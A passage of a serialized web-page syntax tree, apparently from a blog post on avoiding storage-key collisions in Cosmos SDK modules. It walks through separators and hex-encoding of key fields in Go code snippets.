"value":3178},{"type":28,"tag":116,"props":85057,"children":85058},{"class":245,"line":750},[85059,85063],{"type":28,"tag":116,"props":85060,"children":85061},{"style":272},[85062],{"type":33,"value":84889},{"type":28,"tag":116,"props":85064,"children":85065},{"style":266},[85066],{"type":33,"value":3178},{"type":28,"tag":116,"props":85068,"children":85069},{"class":245,"line":779},[85070],{"type":28,"tag":116,"props":85071,"children":85072},{"style":266},[85073],{"type":33,"value":2830},{"type":28,"tag":29,"props":85075,"children":85076},{},[85077],{"type":33,"value":85078},"Inserting a separator helps prevent most accidental collisions, but does it completely solve the problem?",{"type":28,"tag":29,"props":85080,"children":85081},{},[85082,85084,85090,85091,85097],{"type":33,"value":85083},"Sadly, it doesn't. Since the ",{"type":28,"tag":98,"props":85085,"children":85087},{"className":85086},[],[85088],{"type":33,"value":85089},"username",{"type":33,"value":10659},{"type":28,"tag":98,"props":85092,"children":85094},{"className":85093},[],[85095],{"type":33,"value":85096},"vaultName",{"type":33,"value":85098}," are both strings that may contain arbitrary characters (including the separator), collisions can still happen.",{"type":28,"tag":234,"props":85100,"children":85102},{"code":85101},"vaultId = 1, username = \"a|\", positionName = \"b\"\n    => storageKey = \"1|a||b\"\n\nvaultId = 1, username = \"a\",  positionName = \"|b\"\n    => storageKey = \"1|a||b\"\n",[85103],{"type":28,"tag":98,"props":85104,"children":85105},{"__ignoreMap":7},[85106],{"type":33,"value":85101},{"type":28,"tag":29,"props":85108,"children":85109},{},[85110],{"type":33,"value":85111},"To further mitigate this, we could encode all fields to ensure that the separator is excluded in individual fields, thus making field injections impossible.",{"type":28,"tag":234,"props":85113,"children":85115},{"code":85114,"language":75784,"meta":7,"className":75785,"style":7},"const (\n    Seperator = \"|\"\n)\n\n\nusernameEncoded := make(\n    []byte,\n    hex.EncodedLen(len(username)),\n)\nhex.Encode(usernameEncoded, username)\n\npositionNameEncoded := make(\n    []byte,\n    hex.EncodedLen(len(positionName)),\n)\nhex.Encode(positionNameEncoded, positionName)\n\nstorageKey := fmt.Sprintf(\n    \"%d%s%s%s%s\",\n    vaultId,\n    Seperator,\n    usernameEncoded,\n    Seperator,\n    positionNameEncoded\n)\n",[85116],{"type":28,"tag":98,"props":85117,"children":85118},{"__ignoreMap":7},[85119,85130,85145,85152,85159,85166,85187,85203,85241,85248,85285,85292,85312,85327,85363,85370,85405,85412,85439,85450,85461,85472,85484,85495,85503],{"type":28,"tag":116,"props":85120,"children":85121},{"class":245,"line":246},[85122,85126],{"type":28,"tag":116,"props":85123,"children":85124},{"style":376},[85125],{"type":33,"value":9323},{"type":28,"tag":116,"props":85127,"children":85128},{"style":266},[85129],{"type":33,"value":78186},{"type":28,"tag":116,"props":85131,"children":85132},{"class":245,"line":256},[85133,85137,85141],{"type":28,"tag":116,"props":85134,"children":85135},{"style":272},[85136],{"type":33,"value":84949},{"type":28,"tag":116,"props":85138,"children":85139},{"style":370},[85140],{"type":33,"value":2226},{"type":28,"tag":116,"props":85142,"children":85143},{"style":563},[85144],{"type":33,"value":84958},{"type":28,"tag":116,"props":85146,"children":85147},{"class":245,"line":293},[85148],{"type":28,"tag":116,"props":85149,"children":85150},{"style":266},[85151],{"type":33,"value":2830},{"type":28,"tag":116,"props":85153,"children":85154},{"class":245,"line":361},[85155],{"type":28,"tag":116,"props":85156,"children":85157},{"emptyLinePlaceholder":19},[85158],{"type":33,"value":1044},{"type":28,"tag":116,"props":85160,"children":85161},{"class":245,"line":387},[85162],{"type":28,"tag":116,"props":85163,"children":85164},{"emptyLinePlaceholder":19},[85165],{"type":33,"value":1044},{"type":28,"tag":116,"props":85167,"children":85168},{"class":245,"line":400},[85169,85174,85178,85183],{"type":28,"tag":116,"props":85170,"children":85171},{"style":272},[85172],{"type":33,"value":85173},"usernameEncoded",{"type":28,"tag":116,"props":85175,"children":85176},{"style":370},[85177],{"type":33,"value":76036},{"type":28,"tag":116,"props":85179,"children":85180},{"style":282},[85181],{"type":33,"value":85182}," make",{"type":28,"tag":116,"props":85184,"children":85185},{"style":266},[85186],{"type":33,"value":3133},{"type":28,"tag":116,"props":85188,"children":85189},{"class":245,"line":614},[85190,85195,85199],{"type":28,"tag":116,"props":85191,"children":85192},{"style":266},[85193],{"type":33,"value":85194},"    []",{"type":28,"tag":116,"props":85196,"children":85197},{"style":339},[85198],{"type":33,"value":84383},{"type":28,"tag":116,"props":85200,"children":85201},{"style":266},[85202],{"type":33,"value":3178},{"type":28,"tag":116,"props":85204,"children":85205},{"class":245,"line":631},[85206,85211,85215,85220,85224,85228,85232,85236],{"type":28,"tag":116,"props":85207,"children":85208},{"style":272},[85209],{"type":33,"value":85210},"    hex",{"type":28,"tag":116,"props":85212,"children":85213},{"style":266},[85214],{"type":33,"value":141},{"type":28,"tag":116,"props":85216,"children":85217},{"style":282},[85218],{"type":33,"value":85219},"EncodedLen",{"type":28,"tag":116,"props":85221,"children":85222},{"style":266},[85223],{"type":33,"value":313},{"type":28,"tag":116,"props":85225,"children":85226},{"style":282},[85227],{"type":33,"value":8807},{"type":28,"tag":116,"props":85229,"children":85230},{"style":266},[85231],{"type":33,"value":313},{"type":28,"tag":116,"props":85233,"children":85234},{"style":272},[85235],{"type":33,"value":85089},{"type":28,"tag":116,"props":85237,"children":85238},{"style":266},[85239],{"type":33,"value":85240},")),\n",{"type":28,"tag":116,"props":85242,"children":85243},{"class":245,"line":665},[85244],{"type":28,"tag":116,"props":85245,"children":85246},{"style":266},[85247],{"type":33,"value":2830},{"type":28,"tag":116,"props":85249,"children":85250},{"class":245,"line":713},[85251,85256,85260,85265,85269,85273,85277,85281],{"type":28,"tag":116,"props":85252,"children":85253},{"style":272},[85254],{"type":33,"value":85255},"hex",{"type":28,"tag":116,"props":85257,"children":85258},{"style":266},[85259],{"type":33,"value":141},{"type":28,"tag":116,"props":85261,"children":85262},{"style":282},[85263],{"type":33,"value":85264},"Encode",{"type":28,"tag":116,"props":85266,"children":85267},{"style":266},[85268],{"type":33,"value":313},{"type":28,"tag":116,"props":85270,"children":85271},{"style":272},[85272],{"type":33,"value":85173},{"type":28,"tag":116,"props":85274,"children":85275},{"style":266},[85276],{"type":33,"value":825},{"type":28,"tag":116,"props":85278,"children":85279},{"style":272},[85280],{"type":33,"value":85089},{"type":28,"tag":116,"props":85282,"children":85283},{"style":266},[85284],{"type":33,"value":2830},{"type":28,"tag":116,"props":85286,"children":85287},{"class":245,"line":750},[85288],{"type":28,"tag":116,"props":85289,"children":85290},{"emptyLinePlaceholder":19},[85291],{"type":33,"value":1044},{"type":28,"tag":116,"props":85293,"children":85294},{"class":245,"line":779},[85295,85300,85304,85308],{"type":28,"tag":116,"props":85296,"children":85297},{"style":272},[85298],{"type":33,"value":85299},"positionNameEncoded",{"type":28,"tag":116,"props":85301,"children":85302},{"style":370},[85303],{"type":33,"value":76036},{"type":28,"tag":116,"props":85305,"children":85306},{"style":282},[85307],{"type":33,"value":85182},{"type":28,"tag":116,"props":85309,"children":85310},{"style":266},[85311],{"type":33,"value":3133},{"type":28,"tag":116,"props":85313,"children":85314},{"class":245,"line":796},[85315,85319,85323],{"type":28,"tag":116,"props":85316,"children":85317},{"style":266},[85318],{"type":33,"value":85194},{"type":28,"tag":116,"props":85320,"children":85321},{"style":339},[85322],{"type":33,"value":84383},{"type":28,"tag":116,"props":85324,"children":85325},{"style":266},[85326],{"type":33,"value":3178},{"type":28,"tag":116,"props":85328,"children":85329},{"class":245,"line":847},[85330,85334,85338,85342,85346,85350,85354,85359],{"type":28,"tag":116,"props":85331,"children":85332},{"style":272},[85333],{"type":33,"value":85210},{"type":28,"tag":116,"props":85335,"children":85336},{"style":266},[85337],{"type":33,"value":141},{"type":28,"tag":116,"props":85339,"children":85340},{"style":282},[85341],{"type":33,"value":85219},{"type":28,"tag":116,"props":85343,"children":85344},{"style":266},[85345],{"type":33,"value":313},{"type":28,"tag":116,"props":85347,"children":85348},{"style":282},[85349],{"type":33,"value":8807},{"type":28,"tag":116,"props":85351,"children":85352},{"style":266},[85353],{"type":33,"value":313},{"type":28,"tag":116,"props":85355,"children":85356},{"style":272},[85357],{"type":33,"value":85358},"positionName",{"type":28,"tag":116,"props":85360,"children":85361},{"style":266},[85362],{"type":33,"value":85240},{"type":28,"tag":116,"props":85364,"children":85365},{"class":245,"line":898},[85366],{"type":28,"tag":116,"props":85367,"children":85368},{"style":266},[85369],{"type":33,"value":2830},{"type":28,"tag":116,"props":85371,"children":85372},{"class":245,"line":907},[85373,85377,85381,85385,85389,85393,85397,85401],{"type":28,"tag":116,"props":85374,"children":85375},{"style":272},[85376],{"type":33,"value":85255},{"type":28,"tag":116,"props":85378,"children":85379},{"style":266},[85380],{"type":33,"value":141},{"type":28,"tag":116,"props":85382,"children":85383},{"style":282},[85384],{"type":33,"value":85264},{"type":28,"tag":116,"props":85386,"children":85387},{"style":266},[85388],{"type":33,"value":313},{"type":28,"tag":116,"props":85390,"children":85391},{"style":272},[85392],{"type":33,"value":85299},{"type":28,"tag":116,"props":85394,"children":85395},{"style":266},[85396],{"type":33,"value":825},{"type":28,"tag":116,"props":85398,"children":85399},{"style":272},[85400],{"type":33,"value":85358},{"type":28,"tag":116,"props":85402,"children":85403},{"style":266},[85404],{"type":33,"value":2830},{"type":28,"tag":116,"props":85406,"children":85407},{"class":245,"line":981},[85408],{"type":28,"tag":116,"props":85409,"children":85410},{"emptyLinePlaceholder":19},[85411],{"type":33,"value":1044},{"type":28,"tag":116,"props":85413,"children":85414},{"class":245,"line":1011},[85415,85419,85423,85427,85431,85435],{"type":28,"tag":116,"props":85416,"children":85417},{"style":272},[85418],{"type":33,"value":84824},{"type":28,"tag":116,"props":85420,"children":85421},{"style":370},[85422],{"type":33,"value":76036},{"type":28,"tag":116,"props":85424,"children":85425},{"style":272},[85426],{"type":33,"value":81852},{"type":28,"tag":116,"props":85428,"children":85429},{"style":266},[85430],{"type":33,"value":141},{"type":28,"tag":116,"props":85432,"children":85433},{"style":282},[85434],{"type":33,"value":84841},{"type":28,"tag":116,"props":85436,"children":85437},{"style":266},[85438],{"type":33,"value":3133},{"type":28,"tag":116,"props":85440,"children":85441},{"class":245,"line":1029},[85442,85446],{"type":28,"tag":116,"props":85443,"children":85444},{"style":563},[85445],{"type":33,"value":85007},{"type":28,"tag":116,"props":85447,"children":85448},{"style":266},[85449],{"type":33,"value":3178},{"type":28,"tag":116,"props":85451,"children":85452},{"class":245,"line":1038},[85453,85457],{"type":28,"tag":116,"props":85454,"children":85455},{"style":272},[85456],{"type":33,"value":84865},{"type":28,"tag":116,"props":85458,"children":85459},{"style":266},[85460],{"type":33,"value":3178},{"type":28,"tag":116,"props":85462,"children":85463},{"class":245,"line":1047},[85464,85468],{"type":28,"tag":116,"props":85465,"children":85466},{"style":272},[85467],{"type":33,"value":84949},{"type":28,"tag":116,"props":85469,"children":85470},{"style":266},[85471],{"type":33,"value":3178},{"type":28,"tag":116,"props":85473,"children":85474},{"class":245,"line":1071},[85475,85480],{"type":28,"tag":116,"props":85476,"children":85477},{"style":272},[85478],{"type":33,"value":85479},"    usernameEncoded",{"type":28,"tag":116,"props":85481,"children":85482},{"style":266},[85483],{"type":33,"value":3178},{"type":28,"tag":116,"props":85485,"children":85486},{"class":245,"line":1137},[85487,85491],{"type":28,"tag":116,"props":85488,"children":85489},{"style":272},[85490],{"type":33,"value":84949},{"type":28,"tag":116,"props":85492,"children":85493},{"style":266},[85494],{"type":33,"value":3178},{"type":28,"tag":116,"props":85496,"children":85497},{"class":245,"line":1181},[85498],{"type":28,"tag":116,"props":85499,"children":85500},{"style":272},[85501],{"type":33,"value":85502},"    positionNameEncoded\n",{"type":28,"tag":116,"props":85504,"children":85505},{"class":245,"line":1212},[85506],{"type":28,"tag":116,"props":85507,"children":85508},{"style":266},[85509],{"type":33,"value":2830},{"type":28,"tag":29,"props":85511,"children":85512},{},[85513,85515,85520],{"type":33,"value":85514},"We did it. We finally eliminated all potential ",{"type":28,"tag":98,"props":85516,"children":85518},{"className":85517},[],[85519],{"type":33,"value":84824},{"type":33,"value":85521}," collisions.",{"type":28,"tag":29,"props":85523,"children":85524},{},[85525],{"type":33,"value":85526},"Until now, our focus has primarily been on storing a single structure. We recognize that in real-world applications, we frequently encounter scenarios where multiple structures must be stored as persistent states.",{"type":28,"tag":29,"props":85528,"children":85529},{},[85530,85532,85538,85540,85545,85547,85552,85554,85559,85561,85567],{"type":33,"value":85531},"In the Cosmos framework, it is common for each ",{"type":28,"tag":98,"props":85533,"children":85535},{"className":85534},[],[85536],{"type":33,"value":85537},"Module",{"type":33,"value":85539}," to own a few ",{"type":28,"tag":98,"props":85541,"children":85543},{"className":85542},[],[85544],{"type":33,"value":84595},{"type":33,"value":85546}," and have individual ",{"type":28,"tag":98,"props":85548,"children":85550},{"className":85549},[],[85551],{"type":33,"value":79564},{"type":33,"value":85553},"s managing access to storages. It's also important to note that each ",{"type":28,"tag":98,"props":85555,"children":85557},{"className":85556},[],[85558],{"type":33,"value":84595},{"type":33,"value":85560}," should be independent from one another, alleviating developers from having to worry about key collisions between different ",{"type":28,"tag":98,"props":85562,"children":85564},{"className":85563},[],[85565],{"type":33,"value":85566},"Modules",{"type":33,"value":141},{"type":28,"tag":29,"props":85569,"children":85570},{},[85571,85573,85578],{"type":33,"value":85572},"With that being said, what if we have to maintain more than one structure within the same ",{"type":28,"tag":98,"props":85574,"children":85576},{"className":85575},[],[85577],{"type":33,"value":84595},{"type":33,"value":2825},{"type":28,"tag":29,"props":85580,"children":85581},{},[85582,85584,85590,85592,85597],{"type":33,"value":85583},"To demonstrate this scenario, we introduce the ",{"type":28,"tag":98,"props":85585,"children":85587},{"className":85586},[],[85588],{"type":33,"value":85589},"NameToAddressMap",{"type":33,"value":85591}," structure, which will be stored in the same ",{"type":28,"tag":98,"props":85593,"children":85595},{"className":85594},[],[85596],{"type":33,"value":84595},{"type":33,"value":85598}," we previously used.",{"type":28,"tag":234,"props":85600,"children":85602},{"code":85601,"language":75784,"meta":7,"className":75785,"style":7},"type VaultId uint64\ntype Username string\n\ntype PositionName string\ntype Position struct {\n    data []byte\n}\ntype PositionMap :=\n    map[VaultId]map[Username]map[PositionName]Position\n\ntype AddressName string\ntype Address struct {\n data []byte\n}\ntype AddressMap :=\n    map[VaultId]map[Username]map[AddressName]Address\n",[85603],{"type":28,"tag":98,"props":85604,"children":85605},{"__ignoreMap":7},[85606,85621,85636,85643,85658,85677,85692,85699,85714,85769,85776,85792,85812,85827,85834,85850],{"type":28,"tag":116,"props":85607,"children":85608},{"class":245,"line":246},[85609,85613,85617],{"type":28,"tag":116,"props":85610,"children":85611},{"style":376},[85612],{"type":33,"value":32394},{"type":28,"tag":116,"props":85614,"children":85615},{"style":339},[85616],{"type":33,"value":84641},{"type":28,"tag":116,"props":85618,"children":85619},{"style":339},[85620],{"type":33,"value":75822},{"type":28,"tag":116,"props":85622,"children":85623},{"class":245,"line":256},[85624,85628,85632],{"type":28,"tag":116,"props":85625,"children":85626},{"style":376},[85627],{"type":33,"value":32394},{"type":28,"tag":116,"props":85629,"children":85630},{"style":339},[85631],{"type":33,"value":84657},{"type":28,"tag":116,"props":85633,"children":85634},{"style":339},[85635],{"type":33,"value":84662},{"type":28,"tag":116,"props":85637,"children":85638},{"class":245,"line":293},[85639],{"type":28,"tag":116,"props":85640,"children":85641},{"emptyLinePlaceholder":19},[85642],{"type":33,"value":1044},{"type":28,"tag":116,"props":85644,"children":85645},{"class":245,"line":361},[85646,85650,85654],{"type":28,"tag":116,"props":85647,"children":85648},{"style":376},[85649],{"type":33,"value":32394},{"type":28,"tag":116,"props":85651,"children":85652},{"style":339},[85653],{"type":33,"value":84674},{"type":28,"tag":116,"props":85655,"children":85656},{"style":339},[85657],{"type":33,"value":84662},{"type":28,"tag":116,"props":85659,"children":85660},{"class":245,"line":387},[85661,85665,85669,85673],{"type":28,"tag":116,"props":85662,"children":85663},{"style":376},[85664],{"type":33,"value":32394},{"type":28,"tag":116,"props":85666,"children":85667},{"style":339},[85668],{"type":33,"value":7096},{"type":28,"tag":116,"props":85670,"children":85671},{"style":376},[85672],{"type":33,"value":20814},{"type":28,"tag":116,"props":85674,"children":85675},{"style":266},[85676],{"type":33,"value":1291},{"type":28,"tag":116,"props":85678,"children":85679},{"class":245,"line":400},[85680,85684,85688],{"type":28,"tag":116,"props":85681,"children":85682},{"style":272},[85683],{"type":33,"value":42853},{"type":28,"tag":116,"props":85685,"children":85686},{"style":266},[85687],{"type":33,"value":75847},{"type":28,"tag":116,"props":85689,"children":85690},{"style":339},[85691],{"type":33,"value":83846},{"type":28,"tag":116,"props":85693,"children":85694},{"class":245,"line":614},[85695],{"type":28,"tag":116,"props":85696,"children":85697},{"style":266},[85698],{"type":33,"value":406},{"type":28,"tag":116,"props":85700,"children":85701},{"class":245,"line":631},[85702,85706,85710],{"type":28,"tag":116,"props":85703,"children":85704},{"style":376},[85705],{"type":33,"value":32394},{"type":28,"tag":116,"props":85707,"children":85708},{"style":339},[85709],{"type":33,"value":84731},{"type":28,"tag":116,"props":85711,"children":85712},{"style":370},[85713],{"type":33,"value":84736},{"type":28,"tag":116,"props":85715,"children":85716},{"class":245,"line":665},[85717,85721,85725,85729,85733,85737,85741,85745,85749,85753,85757,85761,85765],{"type":28,"tag":116,"props":85718,"children":85719},{"style":376},[85720],{"type":33,"value":84744},{"type":28,"tag":116,"props":85722,"children":85723},{"style":266},[85724],{"type":33,"value":347},{"type":28,"tag":116,"props":85726,"children":85727},{"style":339},[85728],{"type":33,"value":84753},{"type":28,"tag":116,"props":85730,"children":85731},{"style":266},[85732],{"type":33,"value":15074},{"type":28,"tag":116,"props":85734,"children":85735},{"style":376},[85736],{"type":33,"value":66722},{"type":28,"tag":116,"props":85738,"children":85739},{"style":266},[85740],{"type":33,"value":347},{"type":28,"tag":116,"props":85742,"children":85743},{"style":339},[85744],{"type":33,"value":84770},{"type":28,"tag":116,"props":85746,"children":85747},{"style":266},[85748],{"type":33,"value":15074},{"type":28,"tag":116,"props":85750,"children":85751},{"style":376},[85752],{"type":33,"value":66722},{"type":28,"tag":116,"props":85754,"children":85755},{"style":266},[85756],{"type":33,"value":347},{"type":28,"tag":116,"props":85758,"children":85759},{"style":339},[85760],{"type":33,"value":84787},{"type":28,"tag":116,"props":85762,"children":85763},{"style":266},[85764],{"type":33,"value":15074},{"type":28,"tag":116,"props":85766,"children":85767},{"style":339},[85768],{"type":33,"value":84796},{"type":28,"tag":116,"props":85770,"children":85771},{"class":245,"line":713},[85772],{"type":28,"tag":116,"props":85773,"children":85774},{"emptyLinePlaceholder":19},[85775],{"type":33,"value":1044},{"type":28,"tag":116,"props":85777,"children":85778},{"class":245,"line":750},[85779,85783,85788],{"type":28,"tag":116,"props":85780,"children":85781},{"style":376},[85782],{"type":33,"value":32394},{"type":28,"tag":116,"props":85784,"children":85785},{"style":339},[85786],{"type":33,"value":85787}," AddressName",{"type":28,"tag":116,"props":85789,"children":85790},{"style":339},[85791],{"type":33,"value":84662},{"type":28,"tag":116,"props":85793,"children":85794},{"class":245,"line":779},[85795,85799,85804,85808],{"type":28,"tag":116,"props":85796,"children":85797},{"style":376},[85798],{"type":33,"value":32394},{"type":28,"tag":116,"props":85800,"children":85801},{"style":339},[85802],{"type":33,"value":85803}," Address",{"type":28,"tag":116,"props":85805,"children":85806},{"style":376},[85807],{"type":33,"value":20814},{"type":28,"tag":116,"props":85809,"children":85810},{"style":266},[85811],{"type":33,"value":1291},{"type":28,"tag":116,"props":85813,"children":85814},{"class":245,"line":796},[85815,85819,85823],{"type":28,"tag":116,"props":85816,"children":85817},{"style":272},[85818],{"type":33,"value":14768},{"type":28,"tag":116,"props":85820,"children":85821},{"style":266},[85822],{"type":33,"value":75847},{"type":28,"tag":116,"props":85824,"children":85825},{"style":339},[85826],{"type":33,"value":83846},{"type":28,"tag":116,"props":85828,"children":85829},{"class":245,"line":847},[85830],{"type":28,"tag":116,"props":85831,"children":85832},{"style":266},[85833],{"type":33,"value":406},{"type":28,"tag":116,"props":85835,"children":85836},{"class":245,"line":898},[85837,85841,85846],{"type":28,"tag":116,"props":85838,"children":85839},{"style":376},[85840],{"type":33,"value":32394},{"type":28,"tag":116,"props":85842,"children":85843},{"style":339},[85844],{"type":33,"value":85845}," AddressMap",{"type":28,"tag":116,"props":85847,"children":85848},{"style":370},[85849],{"type":33,"value":84736},{"type":28,"tag":116,"props":85851,"children":85852},{"class":245,"line":907},[85853,85857,85861,85865,85869,85873,85877,85881,85885,85889,85893,85898,85902],{"type":28,"tag":116,"props":85854,"children":85855},{"style":376},[85856],{"type":33,"value":84744},{"type":28,"tag":116,"props":85858,"children":85859},{"style":266},[85860],{"type":33,"value":347},{"type":28,"tag":116,"props":85862,"children":85863},{"style":339},[85864],{"type":33,"value":84753},{"type":28,"tag":116,"props":85866,"children":85867},{"style":266},[85868],{"type":33,"value":15074},{"type":28,"tag":116,"props":85870,"children":85871},{"style":376},[85872],{"type":33,"value":66722},{"type":28,"tag":116,"props":85874,"children":85875},{"style":266},[85876],{"type":33,"value":347},{"type":28,"tag":116,"props":85878,"children":85879},{"style":339},[85880],{"type":33,"value":84770},{"type":28,"tag":116,"props":85882,"children":85883},{"style":266},[85884],{"type":33,"value":15074},{"type":28,"tag":116,"props":85886,"children":85887},{"style":376},[85888],{"type":33,"value":66722},{"type":28,"tag":116,"props":85890,"children":85891},{"style":266},[85892],{"type":33,"value":347},{"type":28,"tag":116,"props":85894,"children":85895},{"style":339},[85896],{"type":33,"value":85897},"AddressName",{"type":28,"tag":116,"props":85899,"children":85900},{"style":266},[85901],{"type":33,"value":15074},{"type":28,"tag":116,"props":85903,"children":85904},{"style":339},[85905],{"type":33,"value":85906},"Address\n",{"type":28,"tag":29,"props":85908,"children":85909},{},[85910],{"type":33,"value":85911},"Referencing previous examples, it is necessary to sanitize/encode each key field and add seperators between fields to prevent key collisions. By putting these measures into practice, we present the following implementation below:",{"type":28,"tag":234,"props":85913,"children":85915},{"code":85914,"language":75784,"meta":7,"className":75785,"style":7},"const (\n    Seperator = \"|\"\n)\n\n\nfunc PositionMapKey(\n    vaultId uint64,\n    username, positionName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    positionNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(positionName)),\n    )\n    hex.Encode(positionNameEncoded, positionName)\n\n    key := fmt.Sprintf(\n        \"%d%s%s%s%s\",\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        positionNameEncoded,\n    )\n}\n\n\nfunc AddressMapKey(\n    vaultId uint64,\n    username, addressName []byte\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    addressNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(addressName)),\n    )\n    hex.Encode(addressNameEncoded, addressName)\n\n    key := fmt.Sprintf(\n        \"%d%s%s%s%s\",\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        addressNameEncoded,\n    )\n}\n",[85916],{"type":28,"tag":98,"props":85917,"children":85918},{"__ignoreMap":7},[85919,85930,85945,85952,85959,85966,85982,85997,86024,86047,86066,86082,86118,86125,86160,86167,86187,86202,86237,86244,86279,86286,86314,86326,86338,86350,86362,86373,86385,86392,86399,86406,86413,86429,86444,86468,86491,86510,86525,86560,86567,86602,86609,86629,86644,86679,86686,86722,86729,86756,86767,86778,86789,86800,86811,86823,86830],{"type":28,"tag":116,"props":85920,"children":85921},{"class":245,"line":246},[85922,85926],{"type":28,"tag":116,"props":85923,"children":85924},{"style":376},[85925],{"type":33,"value":9323},{"type":28,"tag":116,"props":85927,"children":85928},{"style":266},[85929],{"type":33,"value":78186},{"type":28,"tag":116,"props":85931,"children":85932},{"class":245,"line":256},[85933,85937,85941],{"type":28,"tag":116,"props":85934,"children":85935},{"style":272},[85936],{"type":33,"value":84949},{"type":28,"tag":116,"props":85938,"children":85939},{"style":370},[85940],{"type":33,"value":2226},{"type":28,"tag":116,"props":85942,"children":85943},{"style":563},[85944],{"type":33,"value":84958},{"type":28,"tag":116,"props":85946,"children":85947},{"class":245,"line":293},[85948],{"type":28,"tag":116,"props":85949,"children":85950},{"style":266},[85951],{"type":33,"value":2830},{"type":28,"tag":116,"props":85953,"children":85954},{"class":245,"line":361},[85955],{"type":28,"tag":116,"props":85956,"children":85957},{"emptyLinePlaceholder":19},[85958],{"type":33,"value":1044},{"type":28,"tag":116,"props":85960,"children":85961},{"class":245,"line":387},[85962],{"type":28,"tag":116,"props":85963,"children":85964},{"emptyLinePlaceholder":19},[85965],{"type":33,"value":1044},{"type":28,"tag":116,"props":85967,"children":85968},{"class":245,"line":400},[85969,85973,85978],{"type":28,"tag":116,"props":85970,"children":85971},{"style":376},[85972],{"type":33,"value":75920},{"type":28,"tag":116,"props":85974,"children":85975},{"style":282},[85976],{"type":33,"value":85977}," PositionMapKey",{"type":28,"tag":116,"props":85979,"children":85980},{"style":266},[85981],{"type":33,"value":3133},{"type":28,"tag":116,"props":85983,"children":85984},{"class":245,"line":614},[85985,85989,85993],{"type":28,"tag":116,"props":85986,"children":85987},{"style":272},[85988],{"type":33,"value":84865},{"type":28,"tag":116,"props":85990,"children":85991},{"style":339},[85992],{"type":33,"value":76041},{"type":28,"tag":116,"props":85994,"children":85995},{"style":266},[85996],{"type":33,"value":3178},{"type":28,"tag":116,"props":85998,"children":85999},{"class":245,"line":631},[86000,86004,86008,86012,86016,86020],{"type":28,"tag":116,"props":86001,"children":86002},{"style":272},[86003],{"type":33,"value":84877},{"type":28,"tag":116,"props":86005,"children":86006},{"style":266},[86007],{"type":33,"value":825},{"type":28,"tag":116,"props":86009,"children":86010},{"style":272},[86011],{"type":33,"value":85358},{"type":28,"tag":116,"props":86013,"children":86014},{"style":266},[86015],{"type":33,"value":75847},{"type":28,"tag":116,"props":86017,"children":86018},{"style":339},[86019],{"type":33,"value":84383},{"type":28,"tag":116,"props":86021,"children":86022},{"style":266},[86023],{"type":33,"value":3178},{"type":28,"tag":116,"props":86025,"children":86026},{"class":245,"line":665},[86027,86031,86035,86039,86043],{"type":28,"tag":116,"props":86028,"children":86029},{"style":266},[86030],{"type":33,"value":76002},{"type":28,"tag":116,"props":86032,"children":86033},{"style":272},[86034],{"type":33,"value":71774},{"type":28,"tag":116,"props":86036,"children":86037},{"style":266},[86038],{"type":33,"value":75847},{"type":28,"tag":116,"props":86040,"children":86041},{"style":339},[86042],{"type":33,"value":84383},{"type":28,"tag":116,"props":86044,"children":86045},{"style":266},[86046],{"type":33,"value":844},{"type":28,"tag":116,"props":86048,"children":86049},{"class":245,"line":713},[86050,86054,86058,86062],{"type":28,"tag":116,"props":86051,"children":86052},{"style":272},[86053],{"type":33,"value":85479},{"type":28,"tag":116,"props":86055,"children":86056},{"style":370},[86057],{"type":33,"value":76036},{"type":28,"tag":116,"props":86059,"children":86060},{"style":282},[86061],{"type":33,"value":85182},{"type":28,"tag":116,"props":86063,"children":86064},{"style":266},[86065],{"type":33,"value":3133},{"type":28,"tag":116,"props":86067,"children":86068},{"class":245,"line":750},[86069,86074,86078],{"type":28,"tag":116,"props":86070,"children":86071},{"style":266},[86072],{"type":33,"value":86073},"        []",{"type":28,"tag":116,"props":86075,"children":86076},{"style":339},[86077],{"type":33,"value":84383},{"type":28,"tag":116,"props":86079,"children":86080},{"style":266},[86081],{"type":33,"value":3178},{"type":28,"tag":116,"props":86083,"children":86084},{"class":245,"line":779},[86085,86090,86094,86098,86102,86106,86110,86114],{"type":28,"tag":116,"props":86086,"children":86087},{"style":272},[86088],{"type":33,"value":86089},"        hex",{"type":28,"tag":116,"props":86091,"children":86092},{"style":266},[86093],{"type":33,"value":141},{"type":28,"tag":116,"props":86095,"children":86096},{"style":282},[86097],{"type":33,"value":85219},{"type":28,"tag":116,"props":86099,"children":86100},{"style":266},[86101],{"type":33,"value":313},{"type":28,"tag":116,"props":86103,"children":86104},{"style":282},[86105],{"type":33,"value":8807},{"type":28,"tag":116,"props":86107,"children":86108},{"style":266},[86109],{"type":33,"value":313},{"type":28,"tag":116,"props":86111,"children":86112},{"style":272},[86113],{"type":33,"value":85089},{"type":28,"tag":116,"props":86115,"children":86116},{"style":266},[86117],{"type":33,"value":85240},{"type":28,"tag":116,"props":86119,"children":86120},{"class":245,"line":796},[86121],{"type":28,"tag":116,"props":86122,"children":86123},{"style":266},[86124],{"type":33,"value":23574},{"type":28,"tag":116,"props":86126,"children":86127},{"class":245,"line":847},[86128,86132,86136,86140,86144,86148,86152,86156],{"type":28,"tag":116,"props":86129,"children":86130},{"style":272},[86131],{"type":33,"value":85210},{"type":28,"tag":116,"props":86133,"children":86134},{"style":266},[86135],{"type":33,"value":141},{"type":28,"tag":116,"props":86137,"children":86138},{"style":282},[86139],{"type":33,"value":85264},{"type":28,"tag":116,"props":86141,"children":86142},{"style":266},[86143],{"type":33,"value":313},{"type":28,"tag":116,"props":86145,"children":86146},{"style":272},[86147],{"type":33,"value":85173},{"type":28,"tag":116,"props":86149,"children":86150},{"style":266},[86151],{"type":33,"value":825},{"type":28,"tag":116,"props":86153,"children":86154},{"style":272},[86155],{"type":33,"value":85089},{"type":28,"tag":116,"props":86157,"children":86158},{"style":266},[86159],{"type":33,"value":2830},{"type":28,"tag":116,"props":86161,"children":86162},{"class":245,"line":898},[86163],{"type":28,"tag":116,"props":86164,"children":86165},{"emptyLinePlaceholder":19},[86166],{"type":33,"value":1044},{"type":28,"tag":116,"props":86168,"children":86169},{"class":245,"line":907},[86170,86175,86179,86183],{"type":28,"tag":116,"props":86171,"children":86172},{"style":272},[86173],{